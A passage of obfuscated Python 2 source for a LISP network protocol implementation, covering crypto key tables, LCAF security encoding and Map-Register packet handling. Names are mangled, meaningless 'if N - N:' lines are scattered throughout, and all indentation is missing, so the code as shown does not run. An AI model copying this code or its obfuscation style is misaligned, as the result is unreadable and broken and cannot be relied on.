self . encrypt_key = lisp_hex_string ( O0Ooo00o0OoOo ) . zfill ( 32 )
i1III = 32 if self . do_poly else 40
self . icv_key = lisp_hex_string ( o0000ooOooOO ) . zfill ( i1III )
if 100 - 100: IiII + i1IIi * OoO0O00
if 64 - 64: oO0o * i11iIiiIii . Oo0Ooo
def do_icv ( self , packet , nonce ) :
if ( self . icv_key == None ) : return ( "" )
if ( self . do_poly ) :
OOo0 = self . icv . poly1305aes
OO00 = self . icv . binascii . hexlify
nonce = OO00 ( nonce )
ii1i = OOo0 ( self . encrypt_key , self . icv_key , nonce , packet )
ii1i = OO00 ( ii1i )
else :
iII1 = binascii . unhexlify ( self . icv_key )
ii1i = hmac . new ( iII1 , packet , self . icv ) . hexdigest ( )
ii1i = ii1i [ 0 : 40 ]
if 31 - 31: Oo0Ooo
return ( ii1i )
if 1 - 1: i1IIi
if 27 - 27: I11i
def add_key_by_nonce ( self , nonce ) :
if ( lisp_crypto_keys_by_nonce . has_key ( nonce ) == False ) :
lisp_crypto_keys_by_nonce [ nonce ] = [ None , None , None , None ]
if 47 - 47: OoooooooOO
lisp_crypto_keys_by_nonce [ nonce ] [ self . key_id ] = self
if 48 - 48: OoOoOO00 . IiII % I1IiiI + I11i
if 37 - 37: Oo0Ooo + I1Ii111 * oO0o / o0oOOo0O0Ooo
def delete_key_by_nonce ( self , nonce ) :
if ( lisp_crypto_keys_by_nonce . has_key ( nonce ) == False ) : return
lisp_crypto_keys_by_nonce . pop ( nonce )
if 78 - 78: IiII + I11i - o0oOOo0O0Ooo + OoO0O00 / iIii1I11I1II1
if 47 - 47: OOooOOo
def add_key_by_rloc ( self , addr_str , encap ) :
I1I111iiII = lisp_crypto_keys_by_rloc_encap if encap else lisp_crypto_keys_by_rloc_decap
if 62 - 62: ooOoO0o * Ii1I % I1ii11iIi11i - i1IIi - I1ii11iIi11i
if 24 - 24: OOooOOo
if ( I1I111iiII . has_key ( addr_str ) == False ) :
I1I111iiII [ addr_str ] = [ None , None , None , None ]
if 71 - 71: IiII - i1IIi
I1I111iiII [ addr_str ] [ self . key_id ] = self
if 56 - 56: OoOoOO00 + oO0o
if 74 - 74: iII111i / I1Ii111 / II111iiii - iII111i / oO0o % I11i
if 19 - 19: IiII % OoooooooOO + OoooooooOO
if 7 - 7: i1IIi
if 91 - 91: OoOoOO00 - OoOoOO00 . IiII
if ( encap == False ) :
lisp_write_ipc_decap_key ( addr_str , I1I111iiII [ addr_str ] )
if 33 - 33: I1Ii111 - iIii1I11I1II1 / Ii1I % O0
if 80 - 80: IiII % OoooooooOO - IiII
if 27 - 27: I1Ii111 - o0oOOo0O0Ooo * I1ii11iIi11i - I1IiiI
def encode_lcaf ( self , rloc_addr ) :
IIIiIIi111 = self . normalize_pub_key ( self . local_public_key )
oo0O0 = self . key_length ( IIIiIIi111 )
Oo0i11iiI11II = ( 6 + oo0O0 + 2 )
if ( rloc_addr != None ) : Oo0i11iiI11II += rloc_addr . addr_length ( )
if 3 - 3: OOooOOo + I11i
ii1i1II = struct . pack ( "HBBBBHBB" , socket . htons ( LISP_AFI_LCAF ) , 0 , 0 ,
LISP_LCAF_SECURITY_TYPE , 0 , socket . htons ( Oo0i11iiI11II ) , 1 , 0 )
if 20 - 20: i11iIiiIii / OoOoOO00 + I1ii11iIi11i / O0
if 97 - 97: i11iIiiIii
if 16 - 16: i1IIi
if 12 - 12: OoOoOO00 % OOooOOo + oO0o . O0 % iIii1I11I1II1
if 41 - 41: OoooooooOO
if 13 - 13: I11i + I1Ii111 - I1Ii111 % oO0o / I11i
O0oOo = self . cipher_suite
ii1i1II += struct . pack ( "BBH" , O0oOo , 0 , socket . htons ( oo0O0 ) )
if 4 - 4: I1IiiI + OOooOOo - IiII + iII111i
if 78 - 78: Ii1I
if 29 - 29: II111iiii
if 79 - 79: iIii1I11I1II1 - i11iIiiIii + ooOoO0o - II111iiii . iIii1I11I1II1
for i1i1IIIIIIIi in range ( 0 , oo0O0 * 2 , 16 ) :
iII1 = int ( IIIiIIi111 [ i1i1IIIIIIIi : i1i1IIIIIIIi + 16 ] , 16 )
ii1i1II += struct . pack ( "Q" , byte_swap_64 ( iII1 ) )
if 84 - 84: Oo0Ooo % I11i * O0 * I11i
if 66 - 66: OOooOOo / iIii1I11I1II1 - OoOoOO00 % O0 . ooOoO0o
if 12 - 12: Oo0Ooo + I1IiiI
if 37 - 37: i1IIi * i11iIiiIii
if 95 - 95: i11iIiiIii % I1Ii111 * Oo0Ooo + i1IIi . O0 + I1ii11iIi11i
if ( rloc_addr ) :
ii1i1II += struct . pack ( "H" , socket . htons ( rloc_addr . afi ) )
ii1i1II += rloc_addr . pack_address ( )
if 7 - 7: OoO0O00 * i11iIiiIii * iIii1I11I1II1 / OOooOOo / I1Ii111
return ( ii1i1II )
if 35 - 35: iII111i * OOooOOo
if 65 - 65: II111iiii % i1IIi
def decode_lcaf ( self , packet , lcaf_len ) :
if 13 - 13: OoO0O00 * I1Ii111 + Oo0Ooo - IiII
if 31 - 31: OoO0O00
if 68 - 68: OoO0O00 + i1IIi / iIii1I11I1II1 + II111iiii * iIii1I11I1II1 + I1ii11iIi11i
if 77 - 77: i11iIiiIii - I1Ii111 . I1ii11iIi11i % Oo0Ooo . Ii1I
if ( lcaf_len == 0 ) :
o00OooooOOOO = "HHBBH"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 9 - 9: o0oOOo0O0Ooo
oO0oO00 , O0Ooo000Ooo , iiii1II , O0Ooo000Ooo , lcaf_len = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] )
if 28 - 28: OoooooooOO % I11i
if 3 - 3: o0oOOo0O0Ooo / Oo0Ooo - OoO0O00 + II111iiii
if ( iiii1II != LISP_LCAF_SECURITY_TYPE ) :
packet = packet [ lcaf_len + 6 : : ]
return ( packet )
if 3 - 3: i11iIiiIii
lcaf_len = socket . ntohs ( lcaf_len )
packet = packet [ oO0o00O : : ]
if 20 - 20: i1IIi * iII111i + OoO0O00 * OoO0O00 / Oo0Ooo
if 83 - 83: I1ii11iIi11i
if 53 - 53: OoOoOO00 % ooOoO0o . OoO0O00 + I1IiiI / I1ii11iIi11i
if 76 - 76: I1ii11iIi11i . iIii1I11I1II1 - i11iIiiIii / I1ii11iIi11i - o0oOOo0O0Ooo
if 95 - 95: I11i
if 76 - 76: II111iiii - i1IIi . O0 * i11iIiiIii % o0oOOo0O0Ooo - iII111i
iiii1II = LISP_LCAF_SECURITY_TYPE
o00OooooOOOO = "BBBBH"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 30 - 30: I1Ii111 % oO0o + oO0o * OoooooooOO - I1ii11iIi11i
OOoOOo , O0Ooo000Ooo , O0oOo , O0Ooo000Ooo , oo0O0 = struct . unpack ( o00OooooOOOO ,
packet [ : oO0o00O ] )
if 22 - 22: OoOoOO00 . II111iiii
if 24 - 24: OoooooooOO / I11i
if 97 - 97: I1ii11iIi11i - ooOoO0o * i11iIiiIii + I1Ii111 % OoooooooOO
if 44 - 44: i11iIiiIii - o0oOOo0O0Ooo + o0oOOo0O0Ooo % O0 / OoooooooOO . OOooOOo
if 3 - 3: O0 - I1Ii111 * Ii1I * OOooOOo / Ii1I
if 58 - 58: Ii1I * iIii1I11I1II1 + ooOoO0o . ooOoO0o
packet = packet [ oO0o00O : : ]
oo0O0 = socket . ntohs ( oo0O0 )
if ( len ( packet ) < oo0O0 ) : return ( None )
if 74 - 74: ooOoO0o - o0oOOo0O0Ooo * IiII % ooOoO0o
if 93 - 93: iIii1I11I1II1 / OoOoOO00 % Oo0Ooo * I1Ii111 - OoO0O00 - o0oOOo0O0Ooo
if 44 - 44: OoooooooOO
if 82 - 82: OoOoOO00 . OoOoOO00
IIiIiIii11I1 = [ LISP_CS_25519_CBC , LISP_CS_25519_GCM , LISP_CS_25519_CHACHA ,
LISP_CS_1024 ]
if ( O0oOo not in IIiIiIii11I1 ) :
lprint ( "Cipher-suites {} supported, received {}" . format ( IIiIiIii11I1 ,
O0oOo ) )
packet = packet [ oo0O0 : : ]
return ( packet )
if 60 - 60: OoooooooOO * Oo0Ooo % I1Ii111
if 68 - 68: O0 - Oo0Ooo . II111iiii % Ii1I % Oo0Ooo + i11iIiiIii
self . cipher_suite = O0oOo
if 90 - 90: II111iiii / OOooOOo * I1IiiI - Oo0Ooo
if 11 - 11: IiII - oO0o - oO0o / I1Ii111 * II111iiii % oO0o
if 39 - 39: oO0o / i11iIiiIii
if 46 - 46: i11iIiiIii . I1ii11iIi11i
if 11 - 11: ooOoO0o
IIIiIIi111 = 0
for i1i1IIIIIIIi in range ( 0 , oo0O0 , 8 ) :
iII1 = byte_swap_64 ( struct . unpack ( "Q" , packet [ i1i1IIIIIIIi : i1i1IIIIIIIi + 8 ] ) [ 0 ] )
IIIiIIi111 <<= 64
IIIiIIi111 |= iII1
if 36 - 36: OoO0O00 % iIii1I11I1II1 - I1ii11iIi11i - i1IIi % o0oOOo0O0Ooo
self . remote_public_key = IIIiIIi111
if 54 - 54: IiII - II111iiii . ooOoO0o + Ii1I
if 45 - 45: oO0o + II111iiii . iII111i / I1ii11iIi11i
if 76 - 76: Ii1I + iII111i - IiII * iIii1I11I1II1 % i1IIi
if 72 - 72: ooOoO0o + II111iiii . O0 - iII111i / OoooooooOO . I1Ii111
if 28 - 28: iIii1I11I1II1 . O0
if ( self . curve25519 ) :
iII1 = lisp_hex_string ( self . remote_public_key )
iII1 = iII1 . zfill ( 64 )
iiiI = ""
for i1i1IIIIIIIi in range ( 0 , len ( iII1 ) , 2 ) :
iiiI += chr ( int ( iII1 [ i1i1IIIIIIIi : i1i1IIIIIIIi + 2 ] , 16 ) )
if 41 - 41: Ii1I
self . remote_public_key = iiiI
if 49 - 49: Ii1I % II111iiii . Ii1I - o0oOOo0O0Ooo - I11i * IiII
if 47 - 47: O0 . o0oOOo0O0Ooo / Ii1I * iII111i
packet = packet [ oo0O0 : : ]
return ( packet )
if 63 - 63: I1Ii111 - oO0o - iII111i - ooOoO0o / oO0o + OoO0O00
if 94 - 94: IiII / I1IiiI . II111iiii
if 32 - 32: oO0o . OOooOOo % OOooOOo . OoOoOO00
if 37 - 37: OOooOOo + O0 + OOooOOo . iII111i . o0oOOo0O0Ooo
if 78 - 78: I1IiiI / I11i + o0oOOo0O0Ooo . Oo0Ooo / O0
if 49 - 49: I1ii11iIi11i
if 66 - 66: o0oOOo0O0Ooo . I1ii11iIi11i
if 18 - 18: Oo0Ooo + IiII
class lisp_thread ( ) :
def __init__ ( self , name ) :
self . thread_name = name
self . thread_number = - 1
self . number_of_pcap_threads = 0
self . number_of_worker_threads = 0
self . input_queue = Queue . Queue ( )
self . input_stats = lisp_stats ( )
self . lisp_packet = lisp_packet ( None )
if 79 - 79: OoO0O00 - O0 + II111iiii % Ii1I . I1IiiI
if 43 - 43: I1IiiI % I1ii11iIi11i * Ii1I
if 31 - 31: Ii1I / iII111i
if 3 - 3: IiII
if 37 - 37: Ii1I * OoooooooOO * I11i + Oo0Ooo . I1IiiI
if 61 - 61: OOooOOo . OOooOOo
if 17 - 17: II111iiii / ooOoO0o
if 80 - 80: OOooOOo * OoO0O00 + Ii1I
if 62 - 62: OoooooooOO . O0 % Oo0Ooo
if 98 - 98: o0oOOo0O0Ooo * Oo0Ooo - Ii1I . ooOoO0o
if 2 - 2: Oo0Ooo - ooOoO0o % iIii1I11I1II1
if 88 - 88: I1Ii111 - OoO0O00
if 79 - 79: iII111i
if 45 - 45: II111iiii + iII111i . I11i . O0 * i1IIi - Ii1I
if 48 - 48: I1ii11iIi11i + Oo0Ooo
if 76 - 76: I1ii11iIi11i
if 98 - 98: II111iiii + I1IiiI - I1ii11iIi11i . Ii1I
if 51 - 51: Ii1I + i11iIiiIii * OoO0O00 % Oo0Ooo / I1IiiI - iIii1I11I1II1
class lisp_control_header ( ) :
def __init__ ( self ) :
self . type = 0
self . record_count = 0
self . nonce = 0
self . rloc_probe = False
self . smr_bit = False
self . smr_invoked_bit = False
self . ddt_bit = False
self . to_etr = False
self . to_ms = False
self . info_reply = False
if 20 - 20: I1Ii111 . I11i . Ii1I + I11i - OOooOOo * oO0o
if 82 - 82: OoO0O00
def decode ( self , packet ) :
o00OooooOOOO = "BBBBQ"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( False )
if 78 - 78: II111iiii / I11i - i11iIiiIii + I1ii11iIi11i * Oo0Ooo
i1Ii1II , iIiI1 , IiIi11i1 , self . record_count , self . nonce = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] )
if 87 - 87: o0oOOo0O0Ooo % Oo0Ooo % II111iiii + iII111i * I1IiiI
if 18 - 18: ooOoO0o * II111iiii
self . type = i1Ii1II >> 4
if ( self . type == LISP_MAP_REQUEST ) :
self . smr_bit = True if ( i1Ii1II & 0x01 ) else False
self . rloc_probe = True if ( i1Ii1II & 0x02 ) else False
self . smr_invoked_bit = True if ( iIiI1 & 0x40 ) else False
if 43 - 43: o0oOOo0O0Ooo / O0 + i1IIi - I1ii11iIi11i % i11iIiiIii
if ( self . type == LISP_ECM ) :
self . ddt_bit = True if ( i1Ii1II & 0x04 ) else False
self . to_etr = True if ( i1Ii1II & 0x02 ) else False
self . to_ms = True if ( i1Ii1II & 0x01 ) else False
if 69 - 69: OOooOOo % I1ii11iIi11i / OoOoOO00 . OOooOOo - IiII
if ( self . type == LISP_NAT_INFO ) :
self . info_reply = True if ( i1Ii1II & 0x08 ) else False
if 74 - 74: OoO0O00 - o0oOOo0O0Ooo - IiII . O0 % ooOoO0o
return ( True )
if 32 - 32: OoOoOO00 . OoO0O00 / Oo0Ooo . i11iIiiIii
if 9 - 9: I11i - II111iiii + I1Ii111 / oO0o % I1ii11iIi11i
def is_info_request ( self ) :
return ( ( self . type == LISP_NAT_INFO and self . is_info_reply ( ) == False ) )
if 17 - 17: iIii1I11I1II1 - ooOoO0o
if 99 - 99: Oo0Ooo + I1Ii111 % ooOoO0o - o0oOOo0O0Ooo
def is_info_reply ( self ) :
return ( True if self . info_reply else False )
if 52 - 52: I1ii11iIi11i
if 93 - 93: iII111i . i11iIiiIii
def is_rloc_probe ( self ) :
return ( True if self . rloc_probe else False )
if 24 - 24: OOooOOo . OoO0O00 + I1Ii111 . oO0o - I1ii11iIi11i % iII111i
if 49 - 49: O0 . Oo0Ooo / Ii1I
def is_smr ( self ) :
return ( True if self . smr_bit else False )
if 29 - 29: I1ii11iIi11i / oO0o * O0 - i11iIiiIii - OoO0O00 + Ii1I
if 86 - 86: I1IiiI / I1ii11iIi11i * Ii1I % i11iIiiIii
def is_smr_invoked ( self ) :
return ( True if self . smr_invoked_bit else False )
if 20 - 20: iII111i . OoooooooOO + iII111i + ooOoO0o * I1ii11iIi11i
if 44 - 44: i11iIiiIii
def is_ddt ( self ) :
return ( True if self . ddt_bit else False )
if 69 - 69: OOooOOo * O0 + i11iIiiIii
if 65 - 65: O0 / iII111i . i1IIi * iII111i / iIii1I11I1II1 - oO0o
def is_to_etr ( self ) :
return ( True if self . to_etr else False )
if 93 - 93: OoOoOO00 % i11iIiiIii - Ii1I % OoO0O00
if 55 - 55: o0oOOo0O0Ooo . I1ii11iIi11i
def is_to_ms ( self ) :
return ( True if self . to_ms else False )
if 63 - 63: oO0o
if 79 - 79: I1ii11iIi11i - oO0o - o0oOOo0O0Ooo . OOooOOo
if 65 - 65: i11iIiiIii . OoO0O00 % iII111i + IiII - i11iIiiIii
if 60 - 60: I1Ii111
if 14 - 14: Oo0Ooo % oO0o * iII111i - i11iIiiIii / I1ii11iIi11i * i11iIiiIii
if 95 - 95: iIii1I11I1II1 + OoOoOO00 . I1IiiI + OoOoOO00 * I11i + OOooOOo
if 14 - 14: Ii1I - O0
if 68 - 68: II111iiii - I1ii11iIi11i - OoO0O00 * iIii1I11I1II1 / I1IiiI * I1ii11iIi11i
if 45 - 45: I1Ii111 * I11i / iIii1I11I1II1 / I1IiiI % II111iiii
if 49 - 49: Ii1I / iII111i . iII111i . iII111i + i11iIiiIii % I11i
if 7 - 7: IiII * ooOoO0o + OoOoOO00
if 22 - 22: iII111i
if 48 - 48: I1ii11iIi11i . I1IiiI
if 73 - 73: O0 . I1Ii111 - OoooooooOO % I11i % i1IIi
if 14 - 14: I1Ii111 + Ii1I * Oo0Ooo
if 49 - 49: Oo0Ooo
if 57 - 57: O0 * ooOoO0o - iII111i - iIii1I11I1II1 * iII111i
if 9 - 9: IiII . I11i
if 23 - 23: O0 % OoooooooOO - O0 . I1IiiI + i11iIiiIii
if 96 - 96: ooOoO0o % O0
if 51 - 51: I1IiiI - iII111i / I1ii11iIi11i . I1ii11iIi11i + I1ii11iIi11i
if 87 - 87: II111iiii . Ii1I * OoO0O00
if 74 - 74: o0oOOo0O0Ooo % OoOoOO00 . iII111i % I1Ii111 . O0 % II111iiii
if 5 - 5: oO0o - OoooooooOO / OoOoOO00
if 30 - 30: I11i % o0oOOo0O0Ooo + i1IIi * OoooooooOO * OoO0O00 - II111iiii
if 55 - 55: OoO0O00
if 20 - 20: ooOoO0o * I1Ii111 * o0oOOo0O0Ooo - ooOoO0o
if 32 - 32: Ii1I * oO0o
if 85 - 85: i11iIiiIii . OoO0O00 + OoO0O00
if 28 - 28: Oo0Ooo
if 62 - 62: Oo0Ooo + OoooooooOO / iII111i
if 60 - 60: Ii1I / OoOoOO00 . I11i % OOooOOo
if 61 - 61: O0 . Ii1I . O0 * i11iIiiIii * II111iiii / I1Ii111
if 69 - 69: I11i
if 17 - 17: I11i
if 38 - 38: I1Ii111 % OOooOOo
if 9 - 9: O0 . iIii1I11I1II1
if 44 - 44: I1ii11iIi11i % IiII
if 6 - 6: OoO0O00
if 82 - 82: iIii1I11I1II1 . I11i / IiII / OOooOOo * II111iiii % oO0o
if 62 - 62: II111iiii
if 96 - 96: I11i % OoOoOO00 * I1ii11iIi11i
if 94 - 94: Oo0Ooo - i1IIi . O0 % Oo0Ooo . ooOoO0o
if 63 - 63: i11iIiiIii % I1ii11iIi11i % I1IiiI . IiII * o0oOOo0O0Ooo + OOooOOo
if 77 - 77: o0oOOo0O0Ooo
if 63 - 63: ooOoO0o * oO0o + ooOoO0o * Ii1I + Oo0Ooo / I1ii11iIi11i
if 15 - 15: O0 . I1ii11iIi11i * I1ii11iIi11i
if 65 - 65: I1Ii111 + O0 % o0oOOo0O0Ooo
if 72 - 72: OOooOOo . OoOoOO00 / II111iiii
class lisp_map_register ( ) :
def __init__ ( self ) :
self . proxy_reply_requested = False
self . lisp_sec_present = False
self . xtr_id_present = False
self . map_notify_requested = False
self . mobile_node = False
self . merge_register_requested = False
self . use_ttl_for_timeout = False
self . map_register_refresh = False
self . record_count = 0
self . nonce = 0
self . alg_id = 0
self . key_id = 0
self . auth_len = 0
self . auth_data = 0
self . xtr_id = 0
self . site_id = 0
self . record_count = 0
self . sport = 0
self . encrypt_bit = 0
self . encryption_key_id = None
if 69 - 69: OOooOOo * II111iiii - ooOoO0o - i1IIi + i11iIiiIii
if 50 - 50: OoooooooOO * i1IIi / oO0o
def print_map_register ( self ) :
oOo0 = lisp_hex_string ( self . xtr_id )
if 19 - 19: o0oOOo0O0Ooo
I111 = ( "{} -> flags: {}{}{}{}{}{}{}{}{}, record-count: " +
"{}, nonce: 0x{}, key/alg-id: {}/{}{}, auth-len: {}, xtr-id: " +
"0x{}, site-id: {}" )
if 19 - 19: OoooooooOO
lprint ( I111 . format ( bold ( "Map-Register" , False ) , "P" if self . proxy_reply_requested else "p" ,
# iIii1I11I1II1 % I1IiiI % O0 * i11iIiiIii % IiII . OoO0O00
"S" if self . lisp_sec_present else "s" ,
"I" if self . xtr_id_present else "i" ,
"T" if self . use_ttl_for_timeout else "t" ,
"R" if self . merge_register_requested else "r" ,
"M" if self . mobile_node else "m" ,
"N" if self . map_notify_requested else "n" ,
"F" if self . map_register_refresh else "f" ,
"E" if self . encrypt_bit else "e" ,
self . record_count , lisp_hex_string ( self . nonce ) , self . key_id ,
self . alg_id , " (sha1)" if ( self . key_id == LISP_SHA_1_96_ALG_ID ) else ( " (sha2)" if ( self . key_id == LISP_SHA_256_128_ALG_ID ) else "" ) , self . auth_len , oOo0 , self . site_id ) )
if 68 - 68: Ii1I . I1Ii111 - o0oOOo0O0Ooo
if 25 - 25: I1Ii111
if 9 - 9: iIii1I11I1II1 / II111iiii * OOooOOo
if 96 - 96: Ii1I + I1ii11iIi11i * OoOoOO00 * IiII * I1ii11iIi11i . I1ii11iIi11i
def encode ( self ) :
i1IiIiiiii11 = ( LISP_MAP_REGISTER << 28 ) | self . record_count
if ( self . proxy_reply_requested ) : i1IiIiiiii11 |= 0x08000000
if ( self . lisp_sec_present ) : i1IiIiiiii11 |= 0x04000000
if ( self . xtr_id_present ) : i1IiIiiiii11 |= 0x02000000
if ( self . map_register_refresh ) : i1IiIiiiii11 |= 0x1000
if ( self . use_ttl_for_timeout ) : i1IiIiiiii11 |= 0x800
if ( self . merge_register_requested ) : i1IiIiiiii11 |= 0x400
if ( self . mobile_node ) : i1IiIiiiii11 |= 0x200
if ( self . map_notify_requested ) : i1IiIiiiii11 |= 0x100
if ( self . encryption_key_id != None ) :
i1IiIiiiii11 |= 0x2000
i1IiIiiiii11 |= self . encryption_key_id << 14
if 43 - 43: ooOoO0o . i1IIi
if 68 - 68: IiII % Oo0Ooo . O0 - OoOoOO00 + I1ii11iIi11i . i11iIiiIii
if 45 - 45: I1IiiI
if 17 - 17: OoooooooOO - ooOoO0o + Ii1I . OoooooooOO % Oo0Ooo
if 92 - 92: I1Ii111 - OOooOOo % OoO0O00 - o0oOOo0O0Ooo % i1IIi
if ( self . alg_id == LISP_NONE_ALG_ID ) :
self . auth_len = 0
else :
if ( self . alg_id == LISP_SHA_1_96_ALG_ID ) :
self . auth_len = LISP_SHA1_160_AUTH_DATA_LEN
if 38 - 38: I1ii11iIi11i . I11i / OoOoOO00 % I11i
if ( self . alg_id == LISP_SHA_256_128_ALG_ID ) :
self . auth_len = LISP_SHA2_256_AUTH_DATA_LEN
if 10 - 10: O0 . I1IiiI * o0oOOo0O0Ooo / iII111i
if 61 - 61: Oo0Ooo - I1Ii111
if 51 - 51: iII111i * ooOoO0o / O0 / O0
ii1i1II = struct . pack ( "I" , socket . htonl ( i1IiIiiiii11 ) )
ii1i1II += struct . pack ( "QBBH" , self . nonce , self . key_id , self . alg_id ,
socket . htons ( self . auth_len ) )
if 52 - 52: OoooooooOO % O0
ii1i1II = self . zero_auth ( ii1i1II )
return ( ii1i1II )
if 56 - 56: oO0o - i1IIi * OoooooooOO - II111iiii
if 28 - 28: i1IIi / I11i . o0oOOo0O0Ooo
def zero_auth ( self , packet ) :
i1 = struct . calcsize ( "I" ) + struct . calcsize ( "QHH" )
iIIiiiIiiii11 = ""
iI1i1i1i1i = 0
if ( self . alg_id == LISP_NONE_ALG_ID ) : return ( packet )
if ( self . alg_id == LISP_SHA_1_96_ALG_ID ) :
iIIiiiIiiii11 = struct . pack ( "QQI" , 0 , 0 , 0 )
iI1i1i1i1i = struct . calcsize ( "QQI" )
if 10 - 10: II111iiii . OOooOOo / iII111i
if ( self . alg_id == LISP_SHA_256_128_ALG_ID ) :
iIIiiiIiiii11 = struct . pack ( "QQQQ" , 0 , 0 , 0 , 0 )
iI1i1i1i1i = struct . calcsize ( "QQQQ" )
if 35 - 35: iII111i / Oo0Ooo + O0 * iIii1I11I1II1 - O0
packet = packet [ 0 : i1 ] + iIIiiiIiiii11 + packet [ i1 + iI1i1i1i1i : : ]
return ( packet )
if 3 - 3: I1ii11iIi11i
if 42 - 42: I11i % Oo0Ooo + IiII - I11i . iIii1I11I1II1 - Ii1I
def encode_auth ( self , packet ) :
i1 = struct . calcsize ( "I" ) + struct . calcsize ( "QHH" )
iI1i1i1i1i = self . auth_len
iIIiiiIiiii11 = self . auth_data
packet = packet [ 0 : i1 ] + iIIiiiIiiii11 + packet [ i1 + iI1i1i1i1i : : ]
return ( packet )
if 27 - 27: iII111i % Oo0Ooo . I1ii11iIi11i . i1IIi % OoOoOO00 . o0oOOo0O0Ooo
if 37 - 37: iII111i + I1Ii111 * Ii1I + IiII
def decode ( self , packet ) :
IiIIIii1iIII1 = packet
o00OooooOOOO = "I"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( [ None , None ] )
if 69 - 69: i1IIi / i11iIiiIii + Oo0Ooo - OoOoOO00
i1IiIiiiii11 = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] )
i1IiIiiiii11 = socket . ntohl ( i1IiIiiiii11 [ 0 ] )
packet = packet [ oO0o00O : : ]
if 13 - 13: IiII . iIii1I11I1II1
o00OooooOOOO = "QBBH"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( [ None , None ] )
if 30 - 30: i1IIi
self . nonce , self . key_id , self . alg_id , self . auth_len = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] )
if 42 - 42: iII111i
if 35 - 35: II111iiii % OOooOOo . oO0o * ooOoO0o
self . auth_len = socket . ntohs ( self . auth_len )
self . proxy_reply_requested = True if ( i1IiIiiiii11 & 0x08000000 ) else False
if 54 - 54: ooOoO0o * I11i - I1Ii111
self . lisp_sec_present = True if ( i1IiIiiiii11 & 0x04000000 ) else False
self . xtr_id_present = True if ( i1IiIiiiii11 & 0x02000000 ) else False
self . use_ttl_for_timeout = True if ( i1IiIiiiii11 & 0x800 ) else False
self . map_register_refresh = True if ( i1IiIiiiii11 & 0x1000 ) else False
self . merge_register_requested = True if ( i1IiIiiiii11 & 0x400 ) else False
self . mobile_node = True if ( i1IiIiiiii11 & 0x200 ) else False
self . map_notify_requested = True if ( i1IiIiiiii11 & 0x100 ) else False
self . record_count = i1IiIiiiii11 & 0xff
if 15 - 15: iII111i / O0
if 61 - 61: i1IIi / i1IIi + ooOoO0o . I1Ii111 * ooOoO0o
if 19 - 19: o0oOOo0O0Ooo . II111iiii / i1IIi
if 82 - 82: O0 / iII111i * OoO0O00 - I11i + Oo0Ooo
self . encrypt_bit = True if i1IiIiiiii11 & 0x2000 else False
if ( self . encrypt_bit ) :
self . encryption_key_id = ( i1IiIiiiii11 >> 14 ) & 0x7
if 47 - 47: I1ii11iIi11i * I1IiiI / I1ii11iIi11i + Ii1I * II111iiii
if 78 - 78: I1Ii111 - i1IIi + OoOoOO00 + Oo0Ooo * I1ii11iIi11i * o0oOOo0O0Ooo
if 97 - 97: i1IIi
if 29 - 29: I1IiiI
if 37 - 37: I1ii11iIi11i * I1Ii111 * I1IiiI * O0
if ( self . xtr_id_present ) :
if ( self . decode_xtr_id ( IiIIIii1iIII1 ) == False ) : return ( [ None , None ] )
if 35 - 35: I1IiiI - I1ii11iIi11i * iII111i + IiII / i1IIi
if 46 - 46: Oo0Ooo . ooOoO0o % Oo0Ooo / II111iiii * ooOoO0o * OOooOOo
packet = packet [ oO0o00O : : ]
if 59 - 59: I1Ii111 * iII111i
if 31 - 31: I11i / O0
if 57 - 57: i1IIi % ooOoO0o
if 69 - 69: o0oOOo0O0Ooo
if ( self . auth_len != 0 ) :
if ( len ( packet ) < self . auth_len ) : return ( [ None , None ] )
if 69 - 69: I1Ii111
if ( self . alg_id not in ( LISP_NONE_ALG_ID , LISP_SHA_1_96_ALG_ID ,
LISP_SHA_256_128_ALG_ID ) ) :
lprint ( "Invalid authentication alg-id: {}" . format ( self . alg_id ) )
return ( [ None , None ] )
if 83 - 83: iIii1I11I1II1 . o0oOOo0O0Ooo + I1Ii111 . OoooooooOO / ooOoO0o + II111iiii
if 90 - 90: Ii1I * iII111i / OOooOOo
iI1i1i1i1i = self . auth_len
if ( self . alg_id == LISP_SHA_1_96_ALG_ID ) :
oO0o00O = struct . calcsize ( "QQI" )
if ( iI1i1i1i1i < oO0o00O ) :
lprint ( "Invalid sha1-96 authentication length" )
return ( [ None , None ] )
if 68 - 68: OoOoOO00
o0oO000oO , IiiIi1 , o0000o0OOOo = struct . unpack ( "QQI" , packet [ : iI1i1i1i1i ] )
iiiiiI1iii11 = ""
elif ( self . alg_id == LISP_SHA_256_128_ALG_ID ) :
oO0o00O = struct . calcsize ( "QQQQ" )
if ( iI1i1i1i1i < oO0o00O ) :
lprint ( "Invalid sha2-256 authentication length" )
return ( [ None , None ] )
if 13 - 13: o0oOOo0O0Ooo % O0 - I1Ii111 * OoooooooOO / Oo0Ooo - OoooooooOO
o0oO000oO , IiiIi1 , o0000o0OOOo , iiiiiI1iii11 = struct . unpack ( "QQQQ" ,
packet [ : iI1i1i1i1i ] )
else :
lprint ( "Unsupported authentication alg-id value {}" . format ( self . alg_id ) )
if 78 - 78: oO0o % OoooooooOO
return ( [ None , None ] )
if 73 - 73: I1IiiI % ooOoO0o % IiII + i1IIi - OoooooooOO / oO0o
self . auth_data = lisp_concat_auth_data ( self . alg_id , o0oO000oO , IiiIi1 ,
o0000o0OOOo , iiiiiI1iii11 )
IiIIIii1iIII1 = self . zero_auth ( IiIIIii1iIII1 )
packet = packet [ self . auth_len : : ]
if 78 - 78: OoooooooOO % oO0o - i11iIiiIii
return ( [ IiIIIii1iIII1 , packet ] )
if 37 - 37: IiII % Ii1I % i1IIi
if 23 - 23: ooOoO0o - O0 + i11iIiiIii
def encode_xtr_id ( self , packet ) :
oO0ooOoOooO00o00 = self . xtr_id >> 64
o0Ooo00Oo0oo0 = self . xtr_id & 0xffffffffffffffff
oO0ooOoOooO00o00 = byte_swap_64 ( oO0ooOoOooO00o00 )
o0Ooo00Oo0oo0 = byte_swap_64 ( o0Ooo00Oo0oo0 )
